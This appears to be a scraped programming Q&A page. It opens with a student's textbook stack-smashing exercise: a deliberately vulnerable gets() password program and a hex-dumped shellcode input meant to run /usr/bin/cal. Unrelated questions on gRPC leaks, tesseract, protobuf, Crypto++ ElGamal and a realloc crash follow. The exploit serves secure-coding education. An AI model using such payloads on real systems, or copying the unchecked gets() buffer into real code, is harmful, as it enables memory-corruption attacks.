I am doing some homework for University and the book I am working from (Secure coding in C and C++ by Robert Seacord) has the following example in it;
You write a simple enter password program and do a stack smash on the program to make the terminal display a calendar snapshot. It's really simple and straightforward as an example of stack smashing. Except I think the book we have to work through was written a long time ago, before Segmentation faults covered this sort of activity.
I have searched a lot of sites (I've added -fno-stach-protector to the g++ compiler, and also set kernel.randomize_va_space=0, neither of these were allowed the exploit code to execute.
Here is the password c++ code;
#include <cstring>
#include <stdio.h>
#include <iostream>
bool isPasswordOkay(void);
int main(void)
{
bool PwStatus;
puts("Enter password:");
PwStatus = isPasswordOkay();
if (PwStatus == false)
{
puts("Access denied");
return 0;
}
else puts("Access granted");
return 0;
}
bool isPasswordOkay(void)
{
char Password[12];
gets(Password);
if (!strcmp(Password, "goodpass"))
return true;
else return(false);
}
and here is the exploit code (exploit.bin);
000 31 32 33 34 35 36 37 38–39 30 31 32 33 34 35 36 "1234567890123456"
010 37 38 39 30 31 32 33 34–35 36 37 38 E0 F9 FF BF "789012345678a. +"
020 31 C0 A3 FF F9 FF BF B0–0B BB 03 FA FF BF B9 FB "1+ú . +≠+. +≠v"
030 F9 FF BF 8B 15 FF F9 FF–BF CD 80 FF F9 FF BF 31 ". +ï§ . +−ç . +1"
040 31 31 31 2F 75 73 72 2F–62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal "
Once the password code has been compiled I execute by entering ./a.out < exploit.bin
When executed, the terminal returns "Segmentation fault (core dumped)". What it should show is a snapshot of the calendar found at "111/usr/bin/cal ".
My question is, is there a way to temporarily disable this segmentation fault in order to allow the exploit code to execute? This would allow me to then go on to do the section as I'm a bit stumped at the moment.
Thank you,
Jon
EDIT: Unfortunatly I can't upload images yet as I'm new, but here is a link to a breakdown of the exploit.bin code; http://imgur.com/lpz9eY4
Related
My Visual Studio project, that use gRPC library have memory leaks. After some R&D I made a little project to reproduce the problem and found that don't even need to call any gRPC object in my code.
My steps:
1) Get helloworld.proto from examples
2) Generate C++ files
3) Create C++ project with next code:
#include "helloworld.grpc.pb.h"
void f(){
helloworld::HelloRequest request;
}
int main(){
_CrtSetDbgFlag(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF);
return 0;
}
Part of Output(full dump have 240 lines):
Detected memory leaks!
Dumping objects ->
{1450} normal block at 0x00FD77A0, 16 bytes long.
Data: <`{ t C | > 60 7B FD 00 20 74 FD 00 84 43 CA 00 88 7C CA 00
{1449} normal block at 0x00FECA30, 48 bytes long.
Data: <google.protobuf.> 67 6F 6F 67 6C 65 2E 70 72 6F 74 6F 62 75 66 2E
{1448} normal block at 0x00FEA048, 8 bytes long.
Data: < > 20 C6 FE 00 00 00 00 00
{1447} normal block at 0x00FEC610, 52 bytes long.
Data: < v p" v > B8 76 FC 00 70 22 FE 00 B8 76 FC 00 00 00 CD CD
{1441} normal block at 0x00FEA610, 32 bytes long.
Data: <google.protobuf.> 67 6F 6F 67 6C 65 2E 70 72 6F 74 6F 62 75 66 2E
{1440} normal block at 0x00FE9B78, 8 bytes long.
If I add google::protobuf::ShutdownProtobufLibrary(); line before return 0;, I will have much less output. Only that:
Detected memory leaks!
Dumping objects ->
{160} normal block at 0x00FCD858, 4 bytes long.
Data: < > 18 D6 B9 00
{159} normal block at 0x00FCD618, 4 bytes long.
Data: < > > C8 3E B9 00
{158} normal block at 0x00FCD678, 4 bytes long.
Data: < ? > D0 3F B9 00
Object dump complete.
But if I include some addition generated sources with many and big services and messages, memory dump will be much bigger.
So since I really don't use any gRPC objects directly, only one think I can imagine is that some static objects still alive when VS Memory Dumper start to work.
Is there a way to fix it or a suggestion what I can do with that?
UPD:
I made some addition work around this problem and open new issue on grpc repository bug tracker: https://github.com/grpc/grpc/issues/22506
Problem Description on that issue contain screenshots with leaked allocations callstack and gRPC debug traces.
UPD2:
I found all of them(1.23.0 version). I leaved the detailed comment there: https://github.com/grpc/grpc/issues/22506#issuecomment-618406755
I have encounter an issue while I am using tesseract library. I have successfully compiled leptonica and tesseract libs, with VS2017. Now, I have used these libraries into MFC project, where they are compiled without any error. Here is the code:
tesseract::TessBaseAPI api;
if (0 != api.Init(NULL, _T("eng"), tesseract::OEM_DEFAULT))
{
m_sState.Format(_T("tesseract initialize error"));
return FALSE;
}
nothing complicate, nothing wrong ... but I met 2 problems:
Even this code is executed or not, I have massive memory leak.
Detected memory leaks! Dumping objects -> {65734} normal block at
0x014EEB88, 24 bytes long. Data: < FXDebug > 10 00 00 00 08 00
00 00 46 58 44 65 62 75 67 00 {65733} normal block at 0x014EEB40, 24
bytes long. Data: < FXDebug > 10 00 00 00 08 00 00 00 46 58 44
65 62 75 67 00 {65732} normal block at 0x03880908, 8 bytes long.
Data: < > 10 BE 96 0F 00 00 00 00 {65731} normal block at
0x014EBDA8, 32 bytes long. Data: < N N N > A8 BD 4E 01 A8 BD
4E 01 A8 BD 4E 01 01 01 CD CD {65730} normal block at 0x03880A20, 8
bytes long. Data: < > 04 BE 96 0F 00 00 00 00 {65729} normal
block at 0x014EE990, 24 bytes long.
Every time when this code is executed, the app is going by "tesseract initialize error" route. I don't understand why ...
I have tried to run this project on VS2017 in Win10 64bit, all libraries and my project are compiled as Debug ... if this matter ... can you help me in order to use tesseract to read simple images ?
Last edit:
When I include this code inta a console app:
#include <leptonica/allheaders.h>
#include <tesseract/baseapi.h>
int main()
{
std::cout << "Hello World!\n";
tesseract::TessBaseAPI api;
if (0 != api.Init(NULL, NULL))
{
std::cout << "tesseract initialize error\n";
std::cout << "Last error:" << GetLastError() << std::endl;
}
}
I get the following error messages:
Hello World!
Error in pixReadMemTiff: function not present
Error in pixReadMem: tiff: no pix returned
Error in pixaGenerateFontFromString: pix not made
Error in bmfCreate: font pixa not made
Error opening data file C:\Program Files (x86)\Tesseract-OCR\eng.traineddata
Please make sure the TESSDATA_PREFIX environment variable is set to your "tessdata" directory.
Failed loading language 'eng'
Tesseract couldn't load any languages!
tesseract initialize error
Last error:3
but I have not any "Tesseract-OCR" folder in "Program Files (x86)" ...
My Protobuf message consists of 3 doubles
syntax = "proto3";
message TestMessage{
double input = 1;
double output = 2;
double info = 3;
}
When I set these values to
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.0);
the serialized message looks like
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 |.#.|
00000013
when using test.serializeToArray and could not be deserialized successfully by a go program using the same protobuf message. When trying to read it from a c++ program I got a 0 as info, so the message seems to be corrupted.
When using test.serializeToOstream I got this message, which could be deserialized successfully by both go and c++ programs.
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 00 00 00 00 00 00 14 40 |.#........#|
0000001b
When setting the values to
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.5678);
the serialized messages, both produced by test.serializeToArray and test.serializeToOstream look like
00000000 09 16 fb cb ee c9 c3 02 40 11 0a 68 22 6c 78 ba |........#..h"lx.|
00000010 15 40 19 da ac fa 5c 6d 45 16 40 |.#....\mE.#|
0000001b
and could be successfully read by my go and cpp program.
What am I missing here? Why is serializeToArray not working in the first case?
EDIT:
As it turns out, serializeToString works fine, too.
Here the code I used for the comparison:
file_a.open(FILEPATH_A);
file_b.open(FILEPATH_B);
test.set_input(2.3456);
test.set_output(5.4321);
test.set_info(5.0);
//serializeToArray
int size = test.ByteSize();
char *buffer = (char*) malloc(size);
test.SerializeToArray(buffer, size);
file_a << buffer;
//serializeToString
std::string buf;
test.SerializeToString(&buf);
file_b << buf;
file_a.close();
file_b.close();
Why does serializeToArray not work as expected?
EDIT2:
When using file_b << buf.data() instead of file_b << buf.data(), the data gets corrupted as well, but why?
I think the error you're making is treating binary as character data and using character data APIs. Many of those APIs stop at the first nil byte (0), but that is a totally valid value in protobuf binary.
You need to make sure you don't use any such APIs basically - stick purely to binary safe APIs.
Since you indicate that size is 27, this all fits.
Basically, the binary representation of 5.0 includes 0 bytes, but you could easily have seen the same problem for other values in time.
I apologise in advance for the n00bishness of asking this question, but I've been stuck for ages and I'm struggling to figure out what to do next. Essentially, I am trying to perform ElGamal encryption on some data. I have been given the public part of an ephemeral key pair and a second static key, as well as some data. If my understanding is correct, this is all I need to perform the encryption, but I'm struggling to figure out how using Crypto++.
I've looked endlessly for examples, but I can find literally zero on Google. Ohloh is less than helpful as I just get back endless pages of the cryptopp ElGamal source files, which I can't seem to be able to figure out (I'm relatively new to using Crypto++ and until about 3 days ago hadn't even heard of ElGamal).
The closest I've been able to find as an example comes from the CryptoPP package itself, which is as follows:
bool ValidateElGamal()
{
cout << "\nElGamal validation suite running...\n\n";
bool pass = true;
{
FileSource fc("TestData/elgc1024.dat", true, new HexDecoder);
ElGamalDecryptor privC(fc);
ElGamalEncryptor pubC(privC);
privC.AccessKey().Precompute();
ByteQueue queue;
privC.AccessKey().SavePrecomputation(queue);
privC.AccessKey().LoadPrecomputation(queue);
pass = CryptoSystemValidate(privC, pubC) && pass;
}
return pass;
}
However, this doesn't really seem to help me much as I'm unaware of how to plug in my already computed values. I am not sure if I'm struggling with my understanding of how Elgamal works (entirely possible) or if I'm just being an idiot when it comes to using what I've got with CryptoPP. Can anyone help point me in the right direction?
I have been given the public part of an ephemeral key pair and a second static key, as well as some data.
We can't really help you here because we know nothing about what is supposed to be done.
The ephemeral key pair is probably for simulating key exchange, and the static key is long term for signing the ephemeral exchange. Other than that, its anybody's guess as to what's going on.
Would you happen to know what the keys are? is the ephemeral key a Diffie-Hellman key and the static key an ElGamal signing key?
If my understanding is correct, this is all I need to perform the encryption, but I'm struggling to figure out how using Crypto++.
For the encryption example, I'm going to cheat a bit and use an RSA encryption example and port it to ElGamal. This is about as difficult as copy and paste because both RSA encryption and ElGamal encryption adhere to the the PK_Encryptor and PK_Decryptor interfaces. See the PK_Encryptor and PK_Decryptor classes for details. (And keep in mind, you might need an ElGamal or Nyberg-Rueppel (NR) signing example).
Crypto++ has a cryptosystem built on ElGamal. The cryptosystem will encrypt a large block of plain text under a symmetric key, and then encrypt the symmetric key under the ElGamal key. I'm not sure what standard it follows, though (likely IEEE's P1363). See SymmetricEncrypt and SymmetricDecrypt in elgamal.h.
The key size is artificially small so the program runs quickly. ElGamal is a discrete log problem, so its key size should be 2048-bits or higher in practice. 2048-bits is blessed by ECRYPT (Asia), ISO/IEC (Worldwide), NESSIE (Europe), and NIST (US).
If you need to save/persist/load the keys you generate, then see Keys and Formats on the Crypto++ wiki. The short answer is to call decryptor.Save() and decryptor.Load(); and stay away from the {BER|DER} encodings.
If you want, you can use a standard string rather than a SecByteBlock. The string will be easier if you are interested in printing stuff to the terminal via cout and friends.
Finally, there's now a page on the Crypto++ Wiki covering the topic with the source code for the program below. See Crypto++'s ElGamal Encryption.
#include <iostream>
using std::cout;
using std::cerr;
using std::endl;
#include <cryptopp/osrng.h>
using CryptoPP::AutoSeededRandomPool;
#include <cryptopp/secblock.h>
using CryptoPP::SecByteBlock;
#include <cryptopp/elgamal.h>
using CryptoPP::ElGamal;
using CryptoPP::ElGamalKeys;
#include <cryptopp/cryptlib.h>
using CryptoPP::DecodingResult;
int main(int argc, char* argv[])
{
////////////////////////////////////////////////
// Generate keys
AutoSeededRandomPool rng;
cout << "Generating private key. This may take some time..." << endl;
ElGamal::Decryptor decryptor;
decryptor.AccessKey().GenerateRandomWithKeySize(rng, 512);
const ElGamalKeys::PrivateKey& privateKey = decryptor.AccessKey();
ElGamal::Encryptor encryptor(decryptor);
const PublicKey& publicKey = encryptor.AccessKey();
////////////////////////////////////////////////
// Secret to protect
static const int SECRET_SIZE = 16;
SecByteBlock plaintext( SECRET_SIZE );
memset( plaintext, 'A', SECRET_SIZE );
////////////////////////////////////////////////
// Encrypt
// Now that there is a concrete object, we can validate
assert( 0 != encryptor.FixedMaxPlaintextLength() );
assert( plaintext.size() <= encryptor.FixedMaxPlaintextLength() );
// Create cipher text space
size_t ecl = encryptor.CiphertextLength( plaintext.size() );
assert( 0 != ecl );
SecByteBlock ciphertext( ecl );
encryptor.Encrypt( rng, plaintext, plaintext.size(), ciphertext );
////////////////////////////////////////////////
// Decrypt
// Now that there is a concrete object, we can check sizes
assert( 0 != decryptor.FixedCiphertextLength() );
assert( ciphertext.size() <= decryptor.FixedCiphertextLength() );
// Create recovered text space
size_t dpl = decryptor.MaxPlaintextLength( ciphertext.size() );
assert( 0 != dpl );
SecByteBlock recovered( dpl );
DecodingResult result = decryptor.Decrypt( rng, ciphertext, ciphertext.size(), recovered );
// More sanity checks
assert( result.isValidCoding );
assert( result.messageLength <= decryptor.MaxPlaintextLength( ciphertext.size() ) );
// At this point, we can set the size of the recovered
// data. Until decryption occurs (successfully), we
// only know its maximum size
recovered.resize( result.messageLength );
// SecByteBlock is overloaded for proper results below
assert( plaintext == recovered );
// If the assert fires, we won't get this far.
if(plaintext == recovered)
cout << "Recovered plain text" << endl;
else
cout << "Failed to recover plain text" << endl;
return !(plaintext == recovered);
}
You can also create the Decryptor from a PrivateKey like so:
ElGamalKeys::PrivateKey k;
k.GenerateRandomWithKeySize(rng, 512);
ElGamal::Decryptor d(k);
...
And an Encryptor from a PublicKey:
ElGamalKeys::PublicKey pk;
privateKey.MakePublicKey(pk);
ElGamal::Encryptor e(pk);
You can save and load keys to and from disk as follows:
ElGamalKeys::PrivateKey privateKey1;
privateKey1.GenerateRandomWithKeySize(prng, 2048);
privateKey1.Save(FileSink("elgamal.der", true /*binary*/).Ref());
ElGamalKeys::PrivateKey privateKey2;
privateKey2.Load(FileSource("elgamal.der", true /*pump*/).Ref());
privateKey2.Validate(prng, 3);
ElGamal::Decryptor decryptor(privateKey2);
// ...
The keys are ASN.1 encoded, so you can dump them with something like Peter Gutmann's dumpasn1:
$ ./cryptopp-elgamal-keys.exe
Generating private key. This may take some time...
$ dumpasn1 elgamal.der
0 556: SEQUENCE {
4 257: INTEGER
: 00 C0 8F 5A 29 88 82 8C 88 7D 00 AE 08 F0 37 AC
: FA F3 6B FC 4D B2 EF 5D 65 92 FD 39 98 04 C7 6D
: 6D 74 F5 FA 84 8F 56 0C DD B4 96 B2 51 81 E3 A1
: 75 F6 BE 82 46 67 92 F2 B3 EC 41 00 70 5C 45 BF
: 40 A0 2C EC 15 49 AD 92 F1 3E 4D 06 E2 89 C6 5F
: 0A 5A 88 32 3D BD 66 59 12 A1 CB 15 B1 72 FE F3
: 2D 19 DD 07 DF A8 D6 4C B8 D0 AB 22 7C F2 79 4B
: 6D 23 CE 40 EC FB DF B8 68 A4 8E 52 A9 9B 22 F1
: [ Another 129 bytes skipped ]
265 1: INTEGER 3
268 257: INTEGER
: 00 BA 4D ED 20 E8 36 AC 01 F6 5C 9C DA 62 11 BB
: E9 71 D0 AB B7 E2 D3 61 37 E2 7B 5C B3 77 2C C9
: FC DE 43 70 AE AA 5A 3C 80 0A 2E B0 FA C9 18 E5
: 1C 72 86 46 96 E9 9A 44 08 FF 43 62 95 BE D7 37
: F8 99 16 59 7D FA 3A 73 DD 0D C8 CA 19 B8 6D CA
: 8D 8E 89 52 50 4E 3A 84 B3 17 BD 71 1A 1D 38 9E
: 4A C4 04 F3 A2 1A F7 1F 34 F0 5A B9 CD B4 E2 7F
: 8C 40 18 22 58 85 14 40 E0 BF 01 2D 52 B7 69 7B
: [ Another 129 bytes skipped ]
529 29: INTEGER
: 01 61 40 24 1F 48 00 4C 35 86 0B 9D 02 8C B8 90
: B1 56 CF BD A4 75 FE E2 8E 0B B3 66 08
: }
0 warnings, 0 errors.
I ran into this error and I don't quite understand what happens here.
I hope the codesnippet is sufficient to make my point.
I am modifying a callback to inject my own data into a response to a server.
Basically the callstack looks as follows:
mainRoutine(browseFunction(browseInternal), myBrowseFunction))
^ takes response ^ sends response ^ catches and modifies response
and sends callback
So what happens:
I have a server and a few hundred static nodes to be read. Now I want to support a highly dynamic messagingsystem, creating a node takes 300kb so is not an option as they are ten thousands, created and deleted within seconds. Therefore I inject the message into the response and pretend a node was read.
So much for the theory. This system worked in other context already, so there is no doubt the server can handle the fake response...
Some code - written in c++ but with the serverstack in C there are no new() or delete() methods available. All variables are initialized and filled with sensible values, as far as possible.
volatile int pNoOfNodesToAppend = 5;
Boolean xAdapter::Browse(BaseNode *pNode, BrowseContext* pBrowseCtx, int i)
{
[... some initializations....]
BrowseResult* pBrowseResult = &pResponse->Results[i];
int NoOfReferences = pBrowseResult->NoOfReferences + pNoOfNodesToAppend;
pResponse->NoOfResults = NoOfReferences;
// Version one
ReferenceDescription* refDesc = reinterpret_cast <ReferenceDescription *>(realloc(
pBrowseResult->References,
sizeof(OpcUa_ReferenceDescription) * NoOfReferences));
//Version two I tried just out of curiousity to see whether copying "by hand" would cause the programm to crash, as it didn't allocate enough memory - but no problem there.
/*
ReferenceDescription* refDesc = reinterpret_cast <ReferenceDescription *>(malloc( NoOfReferences * sizeof(ReferenceDescription)));
for (int k = 0; k < NoOfReferences; k++)
{
memcpy(&pBrowseResult->References[0], &pBrowseResult->References[k], sizeof(ReferenceDescription));
}
*/
int size = _msize(refDesc);
pBrowseResult->NoOfReferences = NoOfReferences;
if (refDesc != NULL)
{
pBrowseResult->References = refDesc;
}
else
{
return False;
/* Errorhandling ... */
}
[Fill with data... check for errors, handle errors]
return True;
}
I know this code looks cumbersome, but most of it cannot be done easier due to the underlying stack, as it gives me a hard time casting types to and forth, containing lots and lots of structures.
This code compiles and runs fine, once the callback is sent it crashes with an access violation at ABABABAB, which as I found out is a magic number used by Microsoft debug to mark guard bits around heapAlloc() memory (4 bits before and after).
See here: Magic_debug_values 1
Edit: This section is solved. I was just too blind to realize that we are talking about HEX here and thus too dumb to calculate my numbers correctly. So consider it unworthy of reading except for understanding of comments.
What really gives me headache is the memsize of the allocated new array.
NoOfReferences: 6
sizeof(ReferenceDescription) 0x00000080 unsigned int
(NoOfReferences * sizeof(ReferenceDescription)) 0x00000300 unsigned long
sizeof(*refDesc) 0x00000080 unsigned int //pointer to first element of array
_msize says:
size of (*refDesc) 0x00000300 int
Now WHY is the size of the newly allocated space 300? If my mind is not playing tricks on me then 6*80 is 480, even if there where 8 guard bits around every single element it would still be 72*6 > 300 bit. Anyway the system proceeds normally.
Now in the next chunk of code the structures in the array are filled with useful data and handed back to the Response structure.
The Callback is sent, the server ist going back to the ServerMain() and then crashes with first chance and unhandled exception
Unhandled exception at 0x5f95ed6a in demoserver.exe: 0xC0000005:
Access violation reading location 0xabababab.
Memory
0x5F95ED6A f3 a5 ff 24 95 84 ee 95 5f 90 8b c7 ba 03 00 00 00 83 e9 04 72 ó¥ÿ$..î._..Ǻ....ƒé.r
0x5F95ED7F 0c 83 e0 03 03 c8 ff 24 85 98 ed 95 5f ff 24 8d 94 ee 95 5f 90 .ƒà..Èÿ$.˜í._ÿ$.”î._.
0x5F95ED94 ff 24 8d 18 ee 95 5f 90 a8 ed 95 5f d4 ed 95 5f f8 ed 95 5f 23 ÿ$..î._.¨í._Ôí._øí._#
0x5F95EDA9 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 ÑŠ.ˆ.ŠF.ˆG.ŠF.Áé.ˆG.ƒ
0x5F95EDBE c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 84 ee 95 5f 8d 49 Æ.ƒÇ.ƒù.rÌó¥ÿ$..î._.I
0x5F95EDD3 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 .#ÑŠ.ˆ.ŠF.Áé.ˆG.ƒÆ.ƒÇ
0x5F95EDE8 02 83 f9 08 72 a6 f3 a5 ff 24 95 84 ee 95 5f 90 23 d1 8a 06 88 .ƒù.r¦ó¥ÿ$..î._.#ÑŠ.ˆ
0x5F95EDFD 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 84 .ƒÆ.Áé.ƒÇ.ƒù.rˆó¥ÿ$..
0x5F95EE12 ee 95 5f 8d 49 00 7b ee 95 5f 68 ee 95 5f 60 ee 95 5f 58 ee 95 î._.I.{î._hî._`î._Xî.
0x5F95EE27 5f 50 ee 95 5f 48 ee 95 5f 40 ee 95 5f 38 ee 95 5f 8b 44 8e e4 _Pî._Hî._#î._8î._.DŽä
0x5F95EE3C 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b .D.ä.DŽè.D.è.DŽì.D.ì.
0x5F95EE51 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 DŽð.D.ð.DŽô.D.ô.DŽø.D
0x5F95EE66 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 .ø.DŽü.D.ü........ð.ø
0x5F95EE7B ff 24 95 84 ee 95 5f 8b ff 94 ee 95 5f 9c ee 95 5f a8 ee 95 5f ÿ$..î._.ÿ”î._œî._¨î._
0x5F95EE90 bc ee 95 5f 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f .î._.E.^_ÉÃ.Š.ˆ..E.^_
0x5F95EEA5 c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d ÉÃ.Š.ˆ.ŠF.ˆG..E.^_ÉÃ.
So the mistake was found. The problem was neither the allocation nor the reassignment of the array but rather the fact, that the API didn't behave as expected and marshalled several callbacks. Trying to add mine by appeding it crashed and caused the exception as it was not ment to be done that way. (Solution and structure would be too complex to post it here.)
Thank you for your time and hints anyway, I learned a lot while chasing the errors!